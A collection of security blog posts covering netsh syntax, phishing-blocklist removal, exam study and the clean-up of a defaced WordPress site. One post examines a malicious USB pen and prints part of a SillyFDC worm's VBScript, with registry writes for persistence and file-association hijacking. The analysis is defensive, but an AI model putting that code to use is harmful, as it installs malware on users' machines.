When I say firewall, I mean a good, old layer 3 packet filtering device. The things that cost $100 new and are, well, ADSL routers with added security aren’t able to protect a small office by themselves. Added security  equals access control lists in a pretty GUI, so not really the poster boy for defense in depth.

Amazing that some IT “professionals” actually believe having a firewall will stop pc’s from getting malicious software. Thanks goodness the USB device fad never took off.

If you do not have anti-virus software on your home or small office computer, Microsoft provides a free copy you can download from here: http://www.microsoft.com/security_essentials/

It does the job, is simple to use and doesn’t cost a penny. You want something with all the whistles and bells, pick a security suite package from any of the big names.

We now return to our regular programme.

This is nothing new or exciting, I just keep forget the syntax so I’m leaving here to make it much easier to find/remember.

Interface Configuration

Interface named Local Area Connection with the static IP address 192.168.66.100, the subnet mask of 255.255.255.0, and a default gateway of 192.168.66.1:

netsh interface ip set address name=”Local Area Connection” static 192.168.66.100 255.255.255.0 192.168.66.1 1

Add multiple ip addresses

netsh interface ip add address ” Local Area Connection ” 192.168.66.101 255.255.255.0

netsh interface ip add address ” Local Area Connection ” 192.168.66.102 255.255.255.0

Configure DNS

netsh interface ip set dns “Local Area Connection” static 192.168.66.200

Add multiple DNS entries

netsh interface ip set dns “Local Area Connection” static 192.168.66.200primary
netsh interface ip add dns name=”Local Area Connection” 192.168.66.201 index=2

Configure WINS

netsh interface ip set wins “Local Area Connection” static 192.168.66.200

DHCP

Automatically obtain an IP address from a DHCP server:
netsh interface ip set address “Local Area Connection” dhcp

Get DHCP DNS/WINS settings:

netsh interface ip set dns “Local Area Connection” dhcp

netsh interface ip set wins “Local Area Connection” wins

Rename interface names

netsh.exe interface set interface name = “Local Area Connection” newname = “INT”

netsh.exe interface set interface name = “Local Area Connection(2)” newname = “Internet”

Disabling/enabling an interface

netsh interface set interface name = “Local Area Connection” admin = disabled

netsh interface set interface name = “Local Area Connection” admin = enable

Export your current IP settings

netsh -c interface dump > c:\current1.txt
import your IP settings
netsh -f c:\current1.txt
You can also use the global EXEC switch instead of -F:
netsh exec c:\current1.txt

LOOPS

FOR /L %I IN (2,1,20) DO netsh interface ip add address “Local Area Connection” 192.168.66.%I 255.255.255.0

This will add ip addresses from 192.168.66.2 to 192.168.66.20 with 1 step each time.

Examples:

http://technet.microsoft.com/en-us/library/bb490943.aspx

http://ss64.com/nt/netsh.html

The first one to fix is Web of Trust (WOT), a plug-in for Firefox that is used as part of safe browsing.

Simple option is to create an account, link to your site under the My Site option, and save the web cookie verifier .html file on your home page. Click on verify the site and request it be reviewed. To speed up the process you can ask a few folks to certified it all okay. Takes about a day to go from Red and malicious to Green and good.

The second on is the excellent folks at www.phishtank.com who help steer folks away from evil phishing sites. They are part of OpenDNS, so if you’re using OpenDNS services, this site is marked as a phishing site and you’re told not to enter. OpenDNS results are used by other services, so fixing the reputation here will clean up other safe browsing tools.

Despite my site not being an actual phishing site, the bad guys linked through my domain name to a compromised web site on the same server.

So should you type:

www.chris-mohan.com/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

and the computer translates it to :

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The /~hackedsite being another user account on the same server as me. Linux helpfully understands the command uses the ip address of my site (which is the same as a couple of hundred hosted others) and redirects to hackedsite web site. in effect this is what happens

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The web site hackedsite got closed down when I reported it by the hosting company, so phishing was no longer an issue.

I registered  an account  on www.phishtank.com and asked for the site to be review and reclassifed now that the bad stuff has been removed. Now waiting to see how long it takes before being reviewed.

Update: The faster way to get the site off phishtank was to send an email to the support team at OpenDNS. The team there turn around my request in under a day

Steve Sims has just posted up two YouTube videos on brute-forcing Address Space Layout Randomization (ASLR) on Linux straight out of the 709 courseware. Excellent timing.

Part 1: http://www.youtube.com/watch?v=DcaVyy4yu88
Part 2: http://www.youtube.com/watch?v=LRjsv5zAHjQ

Plus here is his article in Hackin9 on Hacking ASLR & Stack Canaries on Modern Linux http://hakin9.org/magazine/918-21st-century-hacking-technique

It was a lovely though and I was touched by the gesture.

Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.

The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.

This is some of what I extracted:

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")

Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"

rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.

Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!

Being attacked and having to recover is sadly part of IT life these days, but the more practice, the better you get at it. I’m oddly indebted to this particular attacker as it meant I’ve had to spend time understanding how the hosting company works, how this site is put together and the glaring shortfalls of outsourcing management and security to a third party.

On the 31st of May this blog was defaced and had a number of files uploaded to it.

The defacement was of a political, religious statement nature, which I’d suggest defacing web sites is a bit of a waste of time. Given the attacker lives in a democracy, whether he believes it is or not, I’d recommend he’d spend the time working in worth while, legal groups to express his views or simply help out the local community. If you have a voice and a vote use it, people change the world by words and deed, not by petty vandalism or criminal Paypal pharming schemes to steal money from your fellow man.  I’ll get off my soap box now.

On the 7th of June, I actually noticed the defacement. Oops.

Note to self – be more narcissistic and look at my own blog more often.

In under a minute, I went from shock to annoyance to curiosity. How did this guy get in, what was he actually doing and would I be able to work out how to stop it again?

I wasn’t able to log on to the cpanel to control the site, the wacky security of putting it on a random port over https does not work for locked down corporate environments.

So the first step was to call the hosting company and ask if this was a mass defacement or just me. A number of hosting companies hosting word press site had be compromised due to their bad practices, so best to check. Fortunately for  me I go the support “consultant” that struggled with English. After a painful twenty minutes, the best I got out of the conversation was for him to reset a password and mine was the only site hacked. More on this later. He did offer the gems of: Change your password every couple of weeks and don’t set stuff to 755. Magic. If I was a normal human being 755 would mean the world to me. Thank you!

This is now a great time to bring up the SANS six step incident response steps process. These steps help work through how to deal with this mess:

1. Preparation 2. Identification 3. Containment 4. Eradication 5. Recovery 6. Lessons learned

Identification

After  finish work, I finally got on to the site control panel via cpanel and kicked off a backup of the site just to examine off line what had happened.

The defacement was a simple replacement of the index.php file, which contained a lot of meta data. This meta data confirmed the OS, who had customized the OS and where to get a copy of it, what version of Word the defacement page had been made with and a few other pieces of helpful data. What was really interesting was the uploaded fake PayPal.fr payment page sub-directories and file in the public_html folder. The blog’s site logs also contained entries like this:

/~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/ProfileCCAdd.js

The /~silkhous refers to another home directory on the same hosted server as my blog. Looks like the other site was suffering the same problem, so much for me with the only site being attacked. Nice work hosting provider!

This caused an instant road block. Alerting Paypal that people are being pharmed out weighted my curious and recover process. As there’s no clear, direct way to contact Paypal’s security team, I had to go through customer service. The very nice lady somewhat taken back that someone might do this and asked me to submit my findings to an email address. When I asked to speak to someone directly, I was told the security team was a back office group and couldn’t be directly contacted. Oh well, the Paypal rep was helpful and was pretty excited, so I sent the details off and went back to the clean up.

Containment, Eradication and Recovery

What I’d found didn’t give me any real clear indications of how the attacker got in. I knew what he’d done to the site, and as he’d kindly defaced the site and tagged it with his email address, I was able to out a fair bit of information on him just from search engines. Still, no clear method of how he got in.

The common options to break in to a WordPress/web site are

1) The hosting provide is vulnerable to attacks and then control the entire server*

2) Bad passwords – allowing brute force attacks (password guessing)

3) Poorly written plug-ins allow attackers to execute code and commands on the site

4) Old version of Word Press allow attackers to execute code through know vulnerabilities

I can safely rule out 2 and 4 as entry points, which leaves only 3 something I can do about now.

Since I make backups of the site every after x number of blog pieces I upload, I decided to delete the entire site and upload a fresh copy of WordPress. Using a couple good articles from WordPress, I picked the parts that worked for me from them to add additional security.

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://codex.wordpress.org/Hardening_WordPress

I then move back old versions of the content to the blog, tested, made a few more changes, took a back up again and then reset the passwords again and ran one final check.

*Should this happen again, time to move web site providers to someone who keeps their OS and software up to date…

Lessons Learned

• RTFM WordPress’ security guides
• Avoid having gadgets and plugins just because the look pretty
• Understand the structure and layout of WordPress and the web site
• More regular backups
• Rotate the access logs off the server

So am I safe now?

Possibly, possibly not.

I can say I’ve improved the security of the site and cleaned up some crap. As I still don’t know how he got in, he may just read this, get annoyed and deface the site again using the same hole he did last time. As I think he just ran an automated scanner to find “x” problem then automatically exploit it, he probably won’t read this or even visit the site. Saying that, only a very small number of sites got exploited, so he might come back to visit.

If so and that’s you Mr Attacker- Bonjour là, signalent un commentaire et me font savoir vous êtes entré la première fois. Merci !

I would have used Arabic, but I don’t really trust the translation software. I’ve seen what it does to English.

Jason Haddix linked this

http://measuringmeasures.com/blog/2010/4/19/7-tips-for-successful-self-learning.html

The folks at Cisco Security linked this:

http://etherealmind.com/why-the-ccie-program-is-more-useful-than-the-certification-itself/

I like to think each of us has to find our own way to study, whether it be driven by passion, need or simple curiosity.

My current method is to block out an hour from 8 to 9 pm for serious study. This means avoid distractions – random browsing, tv, tweets, books, arranging DVD’s in alphabetical order and so on – and focusing on one topic.

This, so far, has sort of worked.

Mike Poor has created:

www.packetstan.com 

for all things packet-like.

It’s all about packets and crazy things people do to them.

If that wasn’t enough the first article has been written by Judy Novak. Judy is a rock star of the analyst world and recent received a lifetime achievement award from SANS for her work in this field, plus was one of the authors of the Intrusion Detection In-Depth SANS 503 course. 

If you have no idea what I’m on about, or why I think this is amazing for network/security professionals sign up for Intrusion Detection In-Depth immediately. Do it now, right now. I’ll still be here once you’ve taken a magical trip in to the core of the Internet’s communication DNA and peeked in to a world full of Hex, binary and payloads.

I can only hope Mike convinces Judy to spill some more of her secrets and tips, plus get  many more people to chime in with articles, as this would be an utterly amazing resources for anyone that has to deal with analysing packets on or off the wire.

Since passing the GSE written exam, I’ve been building up a lab, practical practice examples and a stock of reading reference materials. I’ll blab on about the books and what they are at some later point. An interesting aside, some of the operating systems used in the GSE exam have been updated. Backtrack 1 now becomes Backtrack 4 and Fedora 4 becomes Fedora 12 so a great time to master more current OS’s.

The two day practical part of the GSE exam takes place in Las Vegas on the 18th and 19th of September. This means I’ll finish two days of examination hell just in time for the SANS Network Security 2010 conference

As I’m in Las Vegas and SANS is running on of its biggest conferences of the year, I’d be remiss to not try to squeeze in a bit more training.

I’ve applied to be a volunteer as part of SANS work study program and crossing my fingers to be accepted. With forty courses on offer, my number one choice is Steve Sim’s Developing Exploits for Penetration Testers and Security Researchers.

This course is really out of my comfort zone and a huge challenge in itself, nevermind the GSE study that I’m doing. I’ve only really played with the skills the course has taught while studying for OffSec’s PWB exam, but the topic is compelling and will help lift the shroud of script kiddie tools that I use. With both Steve Sims and Jim Shewmaker teaching the course it, should be absolutely brilliant to be able to learn from both these guys and mature my understanding this complex piece of IT security.

I’ve noticed that some very smart cookies are taking this course, including Wesley McGrew. Great, real security researchers, coding gurus and me. Well,  at least I know I asking the person sitting next to me what this all means  should get a sensible answer 

While stuck on a bus, I was idly sifting through Apple’s app store when I found Packet Decode. Some what intrigued, I have a look at it and noticed it was made by my old SANS instructor. Hoping this wasn’t some wacky joke by Chris, I bought the app and had a play. The simple description is that is it a IP/ICMP/TCP & UDP (v4 and v6) cheetsheet on steroids.

This is pretty darn helpful as Chris has written clear description of each field within the packet and has some nifty filters for wireshark and TCPdump. Some though on how the info is displayed means this isn’t cumbersome to navigate, making it a function and useful portable reference. Now if only he added DNS section and my paper SANS TCP/IP cheetsheet could rest happy.

Great as a quick reference, memory jogger or, as I intend to unleash at the next geek pub crawl, away to torture those around me with random facts and demands to know the tcpdump filter syntax for detecting tcp packets with windows size of less than 100. Hours of fun!

Mr Brenton’s web site http://www.chrisbrenton.org/ has some great articles and a number of packet challenges well worth taking the time to work through.